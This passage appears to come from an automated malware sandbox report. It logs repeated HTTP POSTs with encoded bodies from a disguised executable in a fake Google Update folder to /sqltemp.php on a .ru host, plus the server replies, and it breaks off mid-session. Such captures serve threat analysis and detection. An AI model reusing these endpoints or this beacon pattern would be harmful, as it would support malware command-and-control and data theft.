                                                                                                                  Data Ascii: SP_SQ]QVXVRYVPYP[_TXU^PYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$4238;9-#+<_+) "\*+.1,#,*&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:47.863580942 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:48.120013952 CET | 958 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:48 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4bY1QbbyuuKnSuY9lwcPsCKjD5CbO1yAke1nL%2BVKYt0FXdssl1Vxd1N7MxhPKED3u237dh6ktChbY%2FIztBVbrVo1zmABVA%2Bd7yPlb4tZqIjL2pJwjodMzc%2FhRyLJYBAw%2FwBY2sgm"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365ebdecc43ad-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3071&min_rtt=1763&rtt_var=3278&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=119359&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 25 50 2a 13 21 09 26 0b 2b 02 3f 3d 06 0c 26 2d 2e 11 28 01 36 14 30 00 2b 10 3e 00 33 1e 20 2c 29 59 32 16 27 01 37 03 05 12 33 1e 2b 59 05 1c 20 43 36 3c 23 03 2a 13 37 5d 26 2f 36 00 30 10 2f 01 2a 28 28 11 37 02 33 5b 33 03 20 5b 2a 29 23 0b 24 05 3f 5f 2e 06 3d 53 27 2a 2c 54 00 11 26 13 33 57 34 59 34 19 02 59 36 31 18 00 26 24 32 1b 32 3c 2b 19 23 5f 2e 59 32 21 33 13 21 33 0c 11 31 05 21 10 23 3e 2c 08 3e 04 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%P*!&+?=&-.(60+>3 ,)Y2'73+Y C6<#*7]&/60/*((73[3 [*)#$?_.=S'*,T&3W4Y4Y61&$22<+#_.Y2!3!31!#>,>%S -H?WS0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  131 | 192.168.2.6 | 62770 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:47.524353981 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:47.876281023 CET | 1124 | OUT | Data Raw: 56 52 5f 56 54 51 54 51 58 56 52 59 56 5c 59 55 5b 5a 54 5d 55 5b 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VR_VTQTQXVRYV\YU[ZT]U[PXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-':4Y%Y0- 8V7/?)>4Z4 +%//W-:&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:03:47.967863083 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:48.236311913 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:48 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=txu1DgKB0FrDV4QzKVEHfXsHutcpLlGZzdsD36%2FzXjQ1ekkQa75lH1p3bmPofVKYj1UWcvL0AZpxu11mxk1YWTQKjOcao1as8MpP4phxp8wbZLdli%2BRm09%2BEQNSSrZaoKFxCAjq4"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365ec8aa243e2-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1762&min_rtt=1742&rtt_var=694&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=766404&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  132 | 192.168.2.6 | 62771 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:48.364568949 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:03:48.721343994 CET | 1124 | OUT | Data Raw: 56 53 5f 50 54 5d 51 51 58 56 52 59 56 5b 59 53 5b 58 54 5d 55 55 50 5c 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VS_PT]QQXVRYV[YS[XT]UUP\Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.')Z#?3 ;*24$+7T*>#2(+>1$::&Y.,Y-)
                                                                                                                  Jan 1, 2025 16:03:48.828754902 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:48.998639107 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:48 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lGMBHYphPvOArE9%2FWyyhUpqaj8IkBkxYhOTX%2B%2FA61yPlO1PbOJt77pTR7Zqlmat6ulMlZd4T3mg4%2BxtKhrqYyT%2BvbGrl001CZs5zIzm9eGD4ZHpcKz9xWvRDDcJnljEnYFQSZY0q"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365f1dd9b185d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3268&min_rtt=1494&rtt_var=4108&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=93076&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
133 | 192.168.2.6 | 62772 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:03:49.129776001 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:03:49.485686064 CET | 1124 | OUT | Data Raw: 53 52 5f 51 54 5a 54 55 58 56 52 59 56 50 59 56 5b 53 54 58 55 5f 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SR_QTZTUXVRYVPYV[STXU_P^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.^36 ?]3?@;V4>#(*#>+ 1+Z?!A$<'.&Y.,Y-
Jan 1, 2025 16:03:49.582719088 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:03:49.755647898 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:49 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VvsdYdWnJOcb2wmMtpHtgwUsbdeiTKB9teCi1yABnBVd1YFxRNpxSsA2xke3M4FFgM0%2FdivJSJlBr%2FhJK0r2kkwxJu40kNW5JMmOmjTT2PU9zr1DPdp%2B8aORgPyJdm62y0yeE2Qy"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365f69d3a425c-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4716&min_rtt=1787&rtt_var=6528&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=57888&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
134 | 192.168.2.6 | 62773 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:03:49.883611917 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:03:50.235635042 CET | 1124 | OUT | Data Raw: 56 51 5a 54 54 5e 54 56 58 56 52 59 56 5b 59 55 5b 5a 54 50 55 5e 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VQZTT^TVXVRYV[YU[ZTPU^P^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y0\ 0>'C/:W7>8?U=>[4"]*862/,*&Y.,Y-)
Jan 1, 2025 16:03:50.346214056 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:03:50.600403070 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:50 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x6eXNk2amSPXTFC2z95Kmaisr6KbLHCRxE1rqdm6sQoqa6IRqqzX4tHOO7VqV9b06Ca3XBcDgRLeRW%2Blfr0Q7U%2FlDMKxLHf7ikE7V11zL7mhWtnKgTuFV6Pyp0baQtqeD1EO0FJP"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365fb58ff2365-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3391&min_rtt=1898&rtt_var=3699&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=105422&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
135 | 192.168.2.6 | 62774 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:03:50.757451057 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:03:51.112605095 CET | 1124 | OUT | Data Raw: 56 57 5a 53 51 5c 51 57 58 56 52 59 56 5b 59 50 5b 52 54 58 55 5b 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VWZSQ\QWXVRYV[YP[RTXU[PYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$<5\"/"$X?8"!=#+9')?#!?Y+)D%?:&Y.,Y-)
Jan 1, 2025 16:03:51.208331108 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:03:51.479232073 CET | 811 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:51 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yyol%2BwmP%2FIHNY18HW%2B9q7LKLhBIzAry0OUlDKt6bTw1Ri%2Bik5lrk0mN84wNrmUjs2sn%2BslbJsP9rk2qyi7f1EWwH1YlYvrFAMJwtG2HcVmGCcPsHsTVdmDoYCeg0ysbKsF%2FXzL8i"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36600c8f0728d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8628&min_rtt=2021&rtt_var=13972&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=26603&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
136 | 192.168.2.6 | 62775 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:03:51.617417097 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:03:51.970428944 CET | 1124 | OUT | Data Raw: 56 52 5f 5c 54 59 54 5c 58 56 52 59 56 5c 59 5e 5b 5f 54 5d 55 5e 50 5c 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VR_\TYT\XVRYV\Y^[_T]U^P\Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.^3/!Z /*%>+E.*1U#0?:;*(X!2#(;-%<#R9:&Y.,Y-5
Jan 1, 2025 16:03:52.077397108 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:03:52.351999998 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:52 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Ft6EiBUPc9jtmf%2FLU1RN8p7zUjg%2B18jA%2F7yolSdQvHGxlmD5nVfvAp8%2FTh30hf7auChRLJwhrXDCobaykJpK1vATLRLmiK%2FtsNXEDXE49ZbabCKiPuHtGdtzxiQQ2vbmYpK7sYGf"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb366063c6e4367-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3266&min_rtt=1629&rtt_var=3885&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=99151&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
137 | 192.168.2.6 | 62776 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:03:52.493614912 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:03:52.845575094 CET | 1124 | OUT | Data Raw: 53 57 5f 52 51 58 54 56 58 56 52 59 56 5b 59 56 5b 5d 54 5f 55 55 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SW_RQXTVXVRYV[YV[]T_UUP^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y3<"4Y1'.@8:# (: =>8X!!7]<2W9:&Y.,Y-)
Jan 1, 2025 16:03:52.946441889 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
138 | 192.168.2.6 | 62777 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:03:53.133589029 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:03:53.485661983 CET | 1964 | OUT | Data Raw: 56 5f 5f 55 54 5a 54 55 58 56 52 59 56 5c 59 5f 5b 59 54 5a 55 5f 50 55 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: V__UTZTUXVRYV\Y_[YTZU_PUZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.X0<9Y","0-;@8\%W#(<).7!!7\?@2?V.:&Y.,Y-5
Jan 1, 2025 16:03:53.578053951 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:03:53.758378029 CET | 959 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:53 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FS036Cg60pdREnJBa4dBL0iY4%2FTzuOw9ITqyiqBBQPa%2F30yCHXmpH2Y6RhK8%2BBSw2w%2B1suA%2FRfZTou5r67DkzXLS6ba%2BI1F8G1qXc8x7KsrgurrT2GPUAOtisPSWby7DhJ1lofrj"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3660f982919b2-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=1951&rtt_var=780&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=748334&cwnd=148&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 26 09 3d 2d 35 0c 24 22 34 10 2a 2d 24 0f 26 00 3d 00 28 5e 31 04 27 2d 33 5b 29 29 27 13 21 3c 2a 07 24 28 3c 5f 34 3e 30 00 24 0e 2b 59 05 1c 23 1c 35 01 2b 01 29 2d 37 14 25 2f 36 00 26 3e 34 5c 3c 16 2c 55 22 2b 2f 5f 30 03 1d 00 2a 04 20 1d 24 05 33 5c 2e 3f 31 55 24 3a 2c 54 00 11 26 56 24 1f 3b 05 34 19 3f 01 36 57 3d 5f 25 0a 2a 53 25 3c 0e 08 23 07 26 15 32 32 3b 5e 35 1d 26 59 27 3b 2d 10 37 3e 2f 50 29 3e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98&=-5$"4*-$&=(^1'-3[))'!<*$(<_4>0$+Y#5+)-7%/6&>4\<,U"+/_0* $3\.?1U$:,T&V$;4?6W=_%*S%<#&22;^5&Y';-7>/P)>%S -H?WS0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
139 | 192.168.2.6 | 62778 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:03:53.257837057 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
